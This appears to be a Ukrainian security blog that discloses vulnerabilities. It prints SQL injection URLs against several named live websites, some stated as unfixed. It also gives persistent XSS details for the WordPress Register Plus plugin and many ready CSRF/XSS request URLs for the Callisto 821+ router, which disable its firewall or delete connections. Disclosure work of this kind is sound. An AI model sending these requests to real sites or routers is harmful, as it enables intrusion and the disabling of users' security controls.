Websecurity - Веб безпека

22.10.2010

У липні, 02.07.2010, я знайшов SQL Injection уразливість на сайті http://shintorg.kiev.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше.

04.08.2011

SQL Injection:

http://shintorg.kiev.ua/index.php?content_id=-1%20or%20version()%3E4

Дана уразливість досі не виправлена.

16.04.2011

Сьогоні я знайшов численні Cross-Site Scripting уразливості (причому persistent) в плагіні Register Plus для WordPress. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в Register Plus для WordPress.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам плагіна.

03.08.2011

XSS (persistent):

При включених опціях Enable Invitation Code(s) та Enable Invitation Tracking Dashboard Widget та коді <script>alert(document.cookie)</script> в прикладі Invitation Code на сторінці налаштуваннь плагіна (http://site/wp-admin/options-general.php?page=register-plus), код спрацює при заході на сторінку Dashboard (http://site/wp-admin/index.php). Сама persistent XSS має місце в dash_widget.php.

Є багато persistent XSS уразливостей в налаштуваннях плагіна (http://site/wp-admin/options-general.php?page=register-plus). В полях: Enable Password Strength Meter (Short, Bad, Good, Strong), Grace Period, Invitation Code, Disclaimer Title, Disclaimer Content, Agreement Text, License Title, License Content, Agreement Text, Privacy Policy Title, Privacy Policy Content, Agreement Text, Required Field Style Rules, Custom Field, Extra Options, Date Format, First Selectable Date, Default Year, Customize User Notification Email (From Email, From Name, Subject, User Message, Login Redirect URL), Customize Admin Notification Email (From Email, From Name, Subject, Admin Message), Custom Register CSS, Custom Login CSS.

Код спрацює на сторінці налаштувань плагіна і/або на сторінці реєстрації (http://site/wp-login.php?action=register).

При цьому на сторінці налаштуваннь плагіна використовується захист від CSRF, тому необхідно використати reflected XSS для його обходу та проведення persistent XSS атаки.

Уразливі Register Plus 3.5.1 та попередні версії. Враховуючи, що даний плагін більше не підтримується розробником, то його користувачам потрібно виправити дірки власноруч.

21.10.2010

У липні, 02.07.2010, я знайшов SQL Injection та Cross-Site Scripting уразливості на http://www.scb-ua.com - сайті секюріті компанії. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

02.08.2011

SQL Injection:

http://www.scb-ua.com/index.php?content_id=-1%20or%20version()%3E4

XSS:

http://www.scb-ua.com/index.php?content_id=-1%20or%201=1/*%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Дані уразливості (та багато інших, що були на цьому сайті) вже виправлені шляхом заміни движка. Але зараз на даному домені розміщений зовсім інший сайт (замість сайта секюріті фірми), на якому дірок також вистачає. Бо адміни встановили не саму останню версію WP, в якій є уразливості, про які я вже розповідав.

В даній добірці уразливості в веб додатках:

• Security update for EMC NetWorker Module for Microsoft Applications (деталі)
• SQL Injection in Pixie (деталі)
• EMC Replication Manager Client irccd.exe Remote Code Execution Vulnerability (деталі)
• SQL Injection in Pixie (деталі)
• EMC Replication Manager remote code execution vulnerability (деталі)
• request-tracker3.6 security update (деталі)
• Tembria Server Monitor Weak Cryptographic Password Storage Vulnerability (деталі)
• AWStats vulnerability (деталі)
• Tembria Server Monitor Multiple Cross-site Scripting (XSS) Vulnerabilities (деталі)
• phpcms V9 BLind SQL Injection Vulnerability (деталі)

Продовжуючи тему уразливостей в ADSL модемі Callisto 821+, розповім вам про нові уразливості в даному модемі. У квітні, 07.04.2011, я виявив численні Denial of Service, Cross-Site Request Forgery та Cross-Site Scripting уразливості в ADSL модемі Callisto 821+ (SI2000 Callisto821+ Router).

Уразлива версія SI2000 Callisto821+ Router: X7821 Annex A v1.0.0.0 / Argon 4×1 CSP v1.0 (ISOS 9.0) [4.3.4-5.1]. Дана модель з іншими прошивками також повинна бути вразливою.

Дані атаки потрібно проводити на власника модему, який залогінений в адмінку. Враховуючи, що малоймовірно застати його в такому стані, то можна використати раніше згадані уразливості для проведення віддаленого логіну (щоб залогінити його в адмінку). Після чого можна спокійно провести CSRF або XSS атаку.

DoS:

Майже весь функціонал адмінки (той, що працює через POST) вразливий до DoS атаки. Це часткова DoS уразливість, що призводить до зависання модема на 75 секунд (при цьому зависає сама адмінка, а зв’язок з Інтернет через роутер працює). Зависання відбувається при відправці спеціального запиту, а потім кожного разу при будь-яких операціях запису (додавання чи зміна будь-яких налаштувань), видалення (логів чи налаштувань), а в деяких випадках навіть при заході в розділ адмінки. Тобто це persistent partial DoS.

Відправка пустого або некоректного аргумента в параметрі EmWeb_ns:vim:3 (через GET/POST), а іноді й в деяких інших параметрах, а також при вказанні спеціальним чином імен параметрів (як при XSS атаках через імена параметрів, про що я писав раніше) призводить до зависання модема.

http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns:vim:3=

Працювати в таких умовах з адмінкою неможливо. Вирішити це можна лише перезапустив модем.

CSRF:

В розділі Security Interface Configuration (http://192.168.1.1/configuration/firewall.html) через CSRF можна змінювати стан безпеки (Security State) - включати/виключати Security, Firewall та IDS (а при включеному Firewall можна змінювати Security Level), а також можна включати/виключати NAT для інтерфейсів.

В розділі Security: Add Interface (http://192.168.1.1/configuration/fw_addInterface.html) через CSRF можна додавати інтерфейси.

Дана уразливість дозволяє видаляти Security Interfaces. Наприклад, дефолтний інтерфейс (iplan):

http://192.168.1.1/configuration/fw_deleteInterface.html/fwDeleteInterface?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Ffirewall.html&EmWeb_ns%3Avim%3A7.ImFireWall.ImFwInterfaces.iplan=ImFireWall.ImFwInterfaces.iplan

Якщо NAT включений для інтерфейса, то можна змінювати його налаштування. Через CSRF додавати адреси в розділі Add Global Address Pool (http://192.168.1.1/configuration/fw_addAddressPool.html? ImFireWall.ImFwInterfaces.ipmn) та додавати налаштування в розділі Add Reserved Mapping (http://192.168.1.1/configuration/fw_addReservedMapping.html? ImFireWall.ImFwInterfaces.ipmn).

В розділі Security Policy Configuration в підрозділах Firewall Port Filters (http://192.168.1.1/configuration/fw_filter.html? ImFireWall.ImFwPolicies.ext-int) та Configure Validators (http://192.168.1.1/configuration/fw_validators.html? ImFireWall.ImFwPolicies.ext-int) через CSRF можна додавати та видаляти фільтри.

В розділі Security Trigger Configuration (http://192.168.1.1/configuration/fw_trigger.html) через CSRF можна додавати та видаляти трігери.

В розділі Firewall Configure Intrusion Detection (http://192.168.1.1/configuration/fw_ids.html) через CSRF можна змінювати налаштування IDS.

В розділі Security Logging Configuration (http://192.168.1.1/configuration/fw_logging.html) через CSRF можна включати/виключати логування та змінювати його налаштування.

XSS:

У всіх вищезгаданих розділах є багато persistent XSS уразливостей.

http://192.168.1.1/configuration/fw_addInterface.html/fwAddInterface?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Ffirewall.html&EmWeb_ns%3Avim%3A10._interface=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/fw_addInterface.html/fwAddInterface?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Ffirewall.html&EmWeb_ns%3Avim%3A10._interface=ImFwInterface&EmWeb_ns%3Avim%3A2._interface%3AInterfaceName=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/fw_addInterface.html/fwAddInterface?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Ffirewall.html&EmWeb_ns%3Avim%3A10._interface=ImFwInterface&EmWeb_ns%3Avim%3A2._interface%3AInterfaceType=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/fw_addInterface.html/fwAddInterface?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Ffirewall.html&EmWeb_ns%3Avim%3A10._interface=ImFwInterface&EmWeb_ns%3Avim%3A2._interface%3AInterfaceName=ipmn&EmWeb_ns%3Avim%3A13._interface=InterfaceName%2CInterfaceType%3A%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/fw_deleteInterface.html/fwDeleteInterface?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Ffirewall.html&EmWeb_ns%3Avim%3A7.%3Cscript%3Ealert(document.cookie)%3C/script%3E=

А також в самому розділі Security Interface Configuration та в розділах Add Global Address Pool, Add Reserved Mapping, в підрозділах Firewall Port Filters та Configure Validators розділу Security Policy Configuration, в розділах Security Trigger Configuration, Firewall Configure Intrusion Detection та Security Logging Configuration у всіх текстових полях та деяких прихованих полях мають місце persistent XSS уразливості.

А також можливі атаки через імена параметрів (коли XSS код задається в імені параметра), про що я писав раніше.

В даному випадку код виконається одразу, а також при відвіданні сторінок http://192.168.1.1/system/events.html і http://192.168.1.1/shared/event_log_selection.html.

20.10.2010

У липні, 02.07.2010, я знайшов SQL Injection та Cross-Site Scripting уразливості на сайті http://audit-insite.com.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше.

30.07.2011

SQL Injection:

http://audit-insite.com.ua/index.php?content_id=-1%20or%20version()%3E4

XSS:

• alert(document.cookie)
• цікавий
• html включення

Дані уразливості досі не виправлені.

Продовжуючи тему уразливостей в ADSL модемі Callisto 821+, розповім вам про нові уразливості в даному модемі. У квітні, 07.04.2011, я виявив численні Cross-Site Request Forgery та Cross-Site Scripting уразливості в ADSL модемі Callisto 821+ (SI2000 Callisto821+ Router).

Уразлива версія SI2000 Callisto821+ Router: X7821 Annex A v1.0.0.0 / Argon 4×1 CSP v1.0 (ISOS 9.0) [4.3.4-5.1]. Дана модель з іншими прошивками також повинна бути вразливою.

Дані атаки потрібно проводити на власника модему, який залогінений в адмінку. Враховуючи, що малоймовірно застати його в такому стані, то можна використати раніше згадані уразливості для проведення віддаленого логіну (щоб залогінити його в адмінку). Після чого можна спокійно провести CSRF або XSS атаку.

CSRF:

В розділі WAN connections ситуація аналогічна розділу LAN connections. Розглянемо на прикладі дефолтного конекшена (RfcData).

Дана уразливість дозволяє видаляти конекшени.

http://192.168.1.1/configuration/wan_delete_service.html/delete?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fwan_finish.html&EmWeb_ns%3Avim%3A7.ImServices.RfcData=ImServices.RfcData&EmWeb_ns%3Avim%3A7.ImBridge.ImBridgeInterfaces.RfcData=ImBridge.ImBridgeInterfaces.RfcData

В розділі WAN connection: create service (http://192.168.1.1/configuration/wan_create_service.html) є 9 підрозділів для створення конекшенів: RFC 1483 routed, RFC 1483 bridged, PPPoA routed, PPPoA bridged, IPoA routed, PPPoE routed, Ethernet routed, Ethernet bridged, PPPoE over Ethernet/Bridge routed. І у всіх них через CSRF можна створювати конекшени.

В розділі Edit connection в підрозділі Edit Service (http://192.168.1.1/configuration/edit.html?ImServices.RfcData) через CSRF можна змінювати нашалтування конекшена.

В розділі Edit connection в підрозділі Edit RFC1483 (http://192.168.1.1/configuration/edit-form.html? ImServices.RfcData.RfcData) через CSRF можна змінювати нашалтування конекшена.

В розділі Edit connection в підрозділі Edit Atm Channel (http://192.168.1.1/configuration/edit-form.html? ImServices.RfcData.RfcData.ImChannels.item0) через CSRF можна змінювати нашалтування конекшена.

В розділі Edit connection в підрозділі Edit Classifier (http://192.168.1.1/configuration/edit-form.html? ImServices.RfcData.RfcData.ImChannels.item0.Classifier) через CSRF можна змінювати нашалтування конекшена.

В розділі Edit connection в підрозділі Edit Bun Vector Attr (http://192.168.1.1/configuration/edit-form.html?ImServices. RfcData.RfcData.ImChannels.item0.Meter.MeterAppliedProfileName) через CSRF можна змінювати нашалтування конекшена.

В розділі Edit connection в підрозділі Edit Scheduler (http://192.168.1.1/configuration/edit-form.html? ImServices.RfcData.RfcData.ImChannels.item0.Scheduler) через CSRF можна змінювати нашалтування конекшена.

В розділі Edit connection в підрозділі Edit Bridge Interface (http://192.168.1.1/configuration/edit.html? ImBridge.ImBridgeInterfaces.RfcData) через CSRF можна змінювати нашалтування конекшена.

В розділі Create virtual interface (http://192.168.1.1/configuration/create_virtual.html? ImRouter.ImIpInterfaces.ethernet-0&/configuration/wan.html) через CSRF можна створювати віртуальні інтерфейси.

В розділі Delete virtual interface (http://192.168.1.1/configuration/delete_virtual.html ?ImRouter.ImIpInterfaces.item0) через CSRF можна видяляти віртуальні інтерфейси.

XSS:

http://192.168.1.1/configuration/wan_delete_service.html/delete?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fwan_finish.html&EmWeb_ns%3Avim%3A7.1%3Cscript%3Ealert(document.cookie)%3C/script%3E=
http://192.168.1.1/configuration/virtual.html?&%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/create_virtual.html?&%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

У всіх вищезгаданих розділах є багато persistent XSS уразливостей.

В 9 підрозділах розділа WAN connection: create service (RFC 1483 routed, RFC 1483 bridged, PPPoA routed, PPPoA bridged, IPoA routed, PPPoE routed, Ethernet routed, Ethernet bridged, PPPoE over Ethernet/Bridge routed), в підрозділах Edit Service, Edit RFC1483, Edit Atm Channel, Edit Classifier, Edit Bun Vector Attr, Edit Scheduler, Edit Bridge Interface розділа Edit connection, в розділі WAN connection: delete, в розділі Create virtual interface та в розділі Delete virtual interface у всіх текстових полях та деяких прихованих полях мають місце persistent XSS уразливості.

А також можливі атаки через імена параметрів (коли XSS код задається в імені параметра), про що я писав раніше.

В даному випадку код виконається одразу, а також при відвіданні сторінок http://192.168.1.1/system/events.html і http://192.168.1.1/shared/event_log_selection.html. А в підрозділі Edit Service при вказанні XSS коду в параметрі Creator, він виконається на сторінках http://192.168.1.1/configuration/wan.html і http://192.168.1.1/configuration/wan_delete_service.html? ImServices.RfcData, а при вказанні XSS коду в параметрі Description, він виконається також і на сторінці http://192.168.1.1/status.html, яка є стартовою сторінкою адмінки. А також спеціальний XSS код в обох цих параметрах виконається в самому підрозділі Edit Service.

Продовжуючи тему уразливостей в ADSL модемі Callisto 821+, розповім вам про нові уразливості в даному модемі. У квітні, 07.04.2011, я виявив численні Cross-Site Request Forgery та Cross-Site Scripting уразливості в ADSL модемі Callisto 821+ (SI2000 Callisto821+ Router).

Уразлива версія SI2000 Callisto821+ Router: X7821 Annex A v1.0.0.0 / Argon 4×1 CSP v1.0 (ISOS 9.0) [4.3.4-5.1]. Дана модель з іншими прошивками також повинна бути вразливою.

Дані атаки потрібно проводити на власника модему, який залогінений в адмінку. Враховуючи, що малоймовірно застати його в такому стані, то можна використати раніше згадані уразливості для проведення віддаленого логіну (щоб залогінити його в адмінку). Після чого можна спокійно провести CSRF або XSS атаку.

CSRF:

Кожен конекшен в розділі LAN connections, як дефолтний, так й інші конекшени, мають розширені налаштування. Розглянемо на прикладі дефолтного конекшена (iplan).

В розділі Edit connection в підрозділі Edit Ip Interface (http://192.168.1.1/configuration/edit-form.html? ImRouter.ImIpInterfaces.iplan) через CSRF можна змінювати нашалтування (IP, Mask та інші) конекшена.

В підрозділі Edit Tcp Mss Clamp (http://192.168.1.1/configuration/edit-form.html? ImRouter.ImIpInterfaces.iplan.ImTcpMssClamp) через CSRF можна змінювати нашалтування конекшена.

В підрозділі Edit Rip Versions (http://192.168.1.1/configuration/edit-form.html? ImRouter.ImIpInterfaces.iplan.ImRipVersions) через CSRF можна змінювати нашалтування конекшена.

В підрозділі Edit NAT (http://192.168.1.1/configuration/edit-form.html? ImRouter.ImIpInterfaces.iplan.ImNatHelper) через CSRF можна змінювати нашалтування конекшена.

XSS:

В вищезгаданих чотирьох підрозділах розділа Edit connection є багато persistent XSS уразливостей.

В підрозіділі Edit Ip Interface:

http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Aipaddr=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Amask=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Adhcp=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Amtu=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3AsourceAddrValidation=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3AicmpRouterAdvertise=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Aenabled=%3Cscript%3Ealert(document.cookie)%3C/script%3E

В підрозділах Edit Tcp Mss Clamp, Edit Rip Versions та Edit NAT аналогічна ситуація.

А також можливі атаки через імена параметрів (коли XSS код задається в імені параметра), про що я писав раніше.

В даному випадку код виконається одразу, а також при відвіданні сторінок http://192.168.1.1/system/events.html і http://192.168.1.1/shared/event_log_selection.html.

В даній добірці уразливості в веб додатках:

• HP StorageWorks X9000 Network Storage Systems, Remote Unauthenticated Access (деталі)
• SECURITY ADVISORY IBM Cognos 8 Business Intelligence 8.4.1 (деталі)
• SCO Openserver IMAP Daemon Long Verb Parsing Remote Code Execution Vulnerability (деталі)
• Contao CMS 2.9.2 - Persistent Cross Site Scripting Issue (деталі)
• IBM Lotus Notes cai URI Handler Remote Code Execution Vulnerability (деталі)
• ‘Seo Panel’ Cookie-Rendered Persistent XSS Vulnerability (деталі)
• Multiple vulnerabilities in Subversion (деталі)
• Accellion File Transfer Appliance Multiple Vulnerabilities (деталі)
• Simploo CMS Community Edition - Remote PHP Code Execution Issue (деталі)
• DotNetNuke Remote Code Execution vulnerability (деталі)

19.10.2010

У липні, 02.07.2010, я знайшов SQL Injection уразливість на http://varta.net.ua - сайті секюріті компанії. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

22.07.2011

SQL Injection:

http://varta.net.ua/index.php?content_id=-1%20or%20version()%3E4

Дана уразливість досі не виправлена.